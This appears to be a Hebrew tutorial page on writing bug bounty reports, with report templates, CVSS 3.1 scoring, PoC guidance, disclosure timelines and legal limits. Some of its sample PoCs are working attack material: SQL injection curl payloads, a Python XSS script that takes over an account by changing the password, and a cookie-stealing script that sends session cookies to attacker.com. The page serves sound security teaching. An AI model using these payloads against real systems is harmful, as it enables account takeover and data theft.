לדלג לתוכן

כתיבת דוחות מתקדמת - Advanced Report Writing

מבוא

דוח טוב יכול להפוך ממצא בינוני לתשלום גבוה. דוח גרוע יכול להפוך ממצא קריטי לדחייה. כתיבת דוחות היא מיומנות קריטית שמבדילה בין חוקרים חובבים למקצוענים.


מבנה דוח ל-Bug Bounty

מבנה HackerOne

## Title
[Vulnerability type] in [component] allows [impact] to [whom]

## Severity
[CVSS Score] - [Critical/High/Medium/Low]

## Description
[Technical description of the vulnerability, 2-3 paragraphs]

## Steps to Reproduce
1. [First step]
2. [Second step]
3. ...

## Proof of exploit - PoC
[Code, screenshots, or curl commands]

## Impact
[What an attacker can do with the vulnerability]

## Recommended fix
[Fix recommendations]

מבנה Bugcrowd

## Summary
[One sentence describing the vulnerability]

## Vulnerable URL
[The exact address]

## Vulnerable parameter
[The field or parameter]

## Payload
[The payload that was used]

## Steps to Reproduce
[Step-by-step]

## Screenshots / video
[Evidence]

## Browser / environment
[Test environment details]

## Impact
[Impact]

חישוב CVSS v3.1

פרמטרי ה-Base Score

Attack Vector (AV):
  N (Network)  = 0.85  - attack over the network (most common on the web)
  A (Adjacent) = 0.62  - attack from an adjacent network
  L (Local)    = 0.55  - local attack
  P (Physical) = 0.20  - physical attack

Attack Complexity (AC):
  L (Low)  = 0.77  - no special conditions
  H (High) = 0.44  - requires special conditions

Privileges Required (PR):
  N (None) = 0.85  - no privileges
  L (Low)  = 0.62 (0.68 with scope change)
  H (High) = 0.27 (0.50 with scope change)

User Interaction (UI):
  N (None)     = 0.85  - no interaction
  R (Required) = 0.62  - requires interaction

Scope (S):
  U (Unchanged) - impact on the same component
  C (Changed)   - impact on a different component

Impact (C/I/A):
  H (High) = 0.56
  L (Low)  = 0.22
  N (None) = 0.00

דוגמאות חישוב

Example 1: Stored XSS that steals cookies
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
= 5.4 (Medium)

Example 2: SQL Injection without authentication
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
= 9.8 (Critical)

Example 3: SSRF that allows reading files
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
= 8.6 (High)

Example 4: Account Takeover via a chain
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
= 9.3 (Critical)

איך להצדיק את הציון

## Severity justification

**CVSS 3.1: 9.3 (Critical)**
**Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

| Parameter | Value | Justification |
|--------|------|--------|
| AV | Network | The attack is carried out over the network |
| AC | Low | No special conditions - any victim who clicks the link is affected |
| PR | None | The attacker doesn't need an account in the system |
| UI | Required | The victim needs to click a link |
| S | Changed | The XSS runs in the context of target.com but affects the victim's account |
| C | High | Full access to the victim's personal data |
| I | High | Password and email change - full account control |
| A | None | No impact on availability |

כתיבת PoC אפקטיבי

עקרונות

  1. PoC צריך להיות ניתן לשחזור - כל אדם טכני צריך להצליח לחזור עליו
  2. שלב-אחר-שלב - כל פעולה מתועדת
  3. כולל את כל המידע הנדרש - URLs, headers, cookies
  4. לא יותר מדי - לא צריך לכתוב exploit מלא, רק להוכיח את החולשה

PoC עם פקודות curl

## PoC - SQL Injection in /api/users

### Step 1 - a valid request

curl -s 'https://target.com/api/users?id=1' \
-H 'Cookie: session=abc123' | jq .
Response:
```json
{"id": 1, "name": "John Doe", "email": "john@target.com"}

Step 2 - SQL injection

curl -s "https://target.com/api/users?id=1'+OR+1=1--" \
  -H 'Cookie: session=abc123' | jq .

Response - all users are returned:

[
  {"id": 1, "name": "John Doe", "email": "john@target.com"},
  {"id": 2, "name": "Admin", "email": "admin@target.com"},
  ...
]

Step 3 - extract the database version

curl -s "https://target.com/api/users?id=1'+UNION+SELECT+1,version(),3--" \
  -H 'Cookie: session=abc123' | jq .

Response:

{"id": 1, "name": "PostgreSQL 13.4", "email": "3"}

### PoC כסקריפט Python

```python
#!/usr/bin/env python3
"""
PoC - Account Takeover via XSS + CSRF Chain
Target: target.com
Author: researcher
Date: 2026-03-08
"""
import requests

BASE_URL = "https://target.com"

def step1_inject_xss():
    """Step 1: inject XSS into the profile"""
    payload = '<img src=x onerror="fetch(\'/api/change-password\',{method:\'POST\',headers:{\'Content-Type\':\'application/json\'},credentials:\'include\',body:JSON.stringify({new_password:\'hacked123\'})})">'

    response = requests.post(
        f"{BASE_URL}/api/profile",
        json={"bio": payload},
        cookies={"session": "attacker_session"}
    )
    print(f"[1] XSS injection: {response.status_code}")
    return response.status_code == 200

def step2_victim_views_profile():
    """Step 2: the victim views the profile (simulation)"""
    print("[2] The victim browses to the attacker's profile")
    print("    URL: https://target.com/users/attacker")
    print("    The XSS fires automatically")
    return True

def step3_verify_takeover():
    """Step 3: verify the takeover"""
    response = requests.post(
        f"{BASE_URL}/api/login",
        json={
            "email": "victim@target.com",
            "password": "hacked123"  # the password that was changed
        }
    )
    if response.status_code == 200:
        print(f"[3] Takeover succeeded!")
        print(f"    Token: {response.json().get('token', 'N/A')}")
        return True
    else:
        print(f"[3] Failed: {response.status_code}")
        return False

if __name__ == '__main__':
    print("=" * 50)
    print("PoC - Account Takeover via XSS + CSRF")
    print("=" * 50)
    step1_inject_xss()
    step2_victim_views_profile()
    step3_verify_takeover()

מתי להוסיף וידאו PoC

וידאו PoC מומלץ כש:
- השחזור מורכב ודורש תזמון מדויק
- יש אינטראקציית משתמש (clickjacking, CSRF)
- שרשרת חולשות מרובת שלבים
- ה-payload תלוי בהקשר ויזואלי

כלים מומלצים לצילום:
- OBS Studio (חינמי)
- Loom (קל לשיתוף)
- Kazam (לינוקס)


כתיבה לאימפקט מקסימלי

כותרות טובות מול גרועות

Bad:   "XSS on target.com"
Good:  "Stored XSS in User Bio Allows Account Takeover of Any User"

Bad:   "IDOR bug"
Good:  "IDOR in /api/users Exposes PII of 2M Users Including Payment Data"

Bad:   "SSRF found"
Good:  "SSRF in Image Import Leads to AWS Credential Theft and Internal Network Access"

Bad:   "Open Redirect"
Good:  "Open Redirect in OAuth Flow Enables Silent Account Takeover"

תיאור אימפקט עסקי

## Impact - good example

### Technical impact
An attacker can exploit the SQL Injection vulnerability to:
1. Read all the database tables
2. Extract users' personal information (name, email, hashed password)
3. Modify data in the database
4. Under certain conditions - write files to the filesystem

### Business impact
- **Affected users:** all 2.3 million registered users
- **Data type:** PII including full name, email address, phone number, address
- **Regulation:** the data exposure constitutes a GDPR violation with potential fines of up to 4% of annual revenue
- **Reputation:** a data breach like this would require notifying all users and the regulator
- **Financial:** average cost of a data breach - $4.35 million (IBM 2022)
## Impact - bad example

The attacker can steal information from the database. That's bad.

טעויות נפוצות בדוחות

טעות 1 - הגזמה בחומרה

## Bad:
"Critical vulnerability! The entire application is compromised!"
(when it's actually a self-XSS that requires complex interaction)

## Good:
"Medium severity - requires the victim to visit a specific page while
logged in. Impact is limited to the individual user's session."

טעות 2 - חוסר שלבי שחזור

## Bad:
"I found SQL injection in the search parameter. See screenshot."
(no steps, no payload, no context)

## Good:
"1. Navigate to https://target.com/search
2. Enter the following in the search box: ' UNION SELECT 1,2,3--
3. Observe that the response contains '2' and '3' in the results
4. This confirms a UNION-based SQL injection with 3 columns"

טעות 3 - אי-הדגמת אימפקט אמיתי

## Bad:
"XSS payload: <script>alert(1)</script>"
(alert(1) doesn't demonstrate impact)

## Good:
"XSS payload that steals session cookie:
<script>fetch('https://attacker.com/?c='+document.cookie)</script>

Using the stolen cookie, an attacker can:
1. Access the victim's account without credentials
2. View and modify personal information
3. Perform actions on behalf of the victim"

טעות 4 - כפילויות

## Bad:
Submitting 5 separate reports about XSS in the same component with different payloads.

## Good:
One report that describes the root cause and shows that it affects multiple
fields, with examples of different payloads.

תקשורת עם צוותי אבטחה

תגובה לשאלות של Triager

## Question:
"We were unable to reproduce this issue. Can you provide
more details?"

## Good response:
"Thank you for looking into this. Here are additional details:

Environment:
- Browser: Chrome 120.0.6099.109
- OS: macOS 14.2
- Burp Suite Professional v2024.1

The issue requires the following specific conditions:
1. The user must have 2FA disabled
2. The request must include the X-Forwarded-For header
3. The cookie must not have the __Host- prefix

I've attached a video recording showing the full reproduction.
Please let me know if you need anything else."

טיפול במחלוקות

## Situation: the report was closed as Informative

## Professional response:
"I respectfully disagree with the severity assessment. While the
individual finding (open redirect) is typically low severity, I'd
like to highlight the following chain that elevates the impact:

1. The open redirect at /go?url= can be combined with the OAuth
   authorization flow
2. By setting redirect_uri to /go?url=https://attacker.com, the
   authorization code is leaked to the attacker
3. This enables account takeover without user interaction beyond
   the initial click

I've updated the report with a complete PoC demonstrating the
full chain. The CVSS score for this chain is 8.1 (High).

Would you be willing to re-evaluate based on this additional
context?"

תהליך Responsible Disclosure

ציר זמן מקובל

Day 0:     vulnerability discovered
Day 1-3:   writing a detailed report and PoC
Day 3:     reporting to the organization / bug bounty platform
Day 7:     if there's no response - send a reminder
Day 14:    if there's no response - attempt contact via another channel
Day 30:    if there's no response - notice of intent to publish
Day 90:    publication is allowed (per most platforms' policy)

שיקולים משפטיים

Allowed:
- security testing within a bug bounty program
- direct reporting to the organization via accepted channels
- publication after the fix (coordinated with the organization)

Not allowed:
- exploiting the vulnerability for personal gain
- accessing data beyond what's needed for proof
- sharing the vulnerability with third parties before the fix
- extortion or threats

תבנית לדוח מקצועי

# [Vulnerability type] in [component] allows [impact]

## General information
| Field | Value |
|------|-------|
| Platform | HackerOne |
| Program | [program name] |
| Discovery date | YYYY-MM-DD |
| Vulnerable URL | https://target.com/vulnerable-endpoint |
| Parameter | [parameter name] |
| Vulnerability type | [CWE-XXX: name] |

## Severity
**CVSS 3.1:** X.X ([Critical/High/Medium/Low])
**Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

## Summary
[2-3 sentences describing the vulnerability and impact]

## Technical description
[Detailed description of the vulnerability, including the technical cause]

## Steps to Reproduce
### Prerequisites
- [required browser/tool]
- [required account]
- [special settings]

### Steps
1. [First step - including exact URL/command]
2. [Second step]
3. [Third step]
4. [Expected result]

## PoC

### curl command

curl -X POST 'https://target.com/api/endpoint' \
-H 'Content-Type: application/json' \
-H 'Cookie: session=abc123' \
-d '{"param": "payload"}'
### Script (optional)
```python
## PoC script
...

Screenshots

[Screenshot 1 - description]
[Screenshot 2 - description]

Impact

Technical

  • [what the attacker can do]

Business

  • [impact on users]
  • [impact on the business]
  • [regulatory impact]
  1. [primary fix]
  2. [secondary fix / defense in depth]
  3. [additional recommendations]

References

  • CWE-XXX
  • OWASP - name
  • [relevant articles]
    ---
    
    ## דוגמאות: דוח טוב מול דוח גרוע
    
    ### דוח גרוע
    

    Title: XSS bug

I found XSS on your site. Here is the payload:

Please fix ASAP. This is critical.

### דוח טוב

Title: Stored XSS in Comment Feature Allows Session Hijacking of Any User

Severity

CVSS 3.1: 6.1 (Medium)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Summary

A stored cross-site scripting (XSS) vulnerability exists in the comment
feature at /posts/{id}/comments. An authenticated user can inject arbitrary
JavaScript that executes in the browser of any user viewing the comment.
This can be used to steal session cookies, perform actions on behalf of
victims, or redirect users to phishing pages.

Steps to Reproduce

  1. Log in to https://target.com with any user account
  2. Navigate to any post, e.g., https://target.com/posts/123
  3. In the comment box, enter the following payload:
  4. Click "Submit Comment"
  5. Open an incognito window and log in as a different user
  6. Navigate to the same post
  7. Observe in the browser's network tab that a request is made to
    attacker.com with the victim's session cookie

Impact

  • An attacker can steal session cookies of any user who views the comment
  • With the stolen cookie, the attacker can access the victim's account
  • The attacker can perform any action the victim can: view personal data,
    modify settings, make purchases
  • Since comments are visible on popular posts, this could affect thousands
    of users

Remediation

  1. Implement output encoding for all user-generated content
  2. Add Content-Security-Policy header to prevent inline script execution
  3. Set HttpOnly flag on session cookies to prevent JavaScript access
  4. Consider implementing a Content Security Policy with strict nonce-based
    script execution
    ---
    
    ## סיכום
    

    Principles for an excellent report:
  5. A title that describes the impact, not just the vulnerability type
  6. CVSS calculated and justified
  7. Clear reproduction steps that anyone can perform
  8. A PoC that demonstrates real impact (not alert(1))
  9. Business impact, not just technical
  10. A recommended fix that shows you understand the problem
  11. Professional and respectful communication
    ```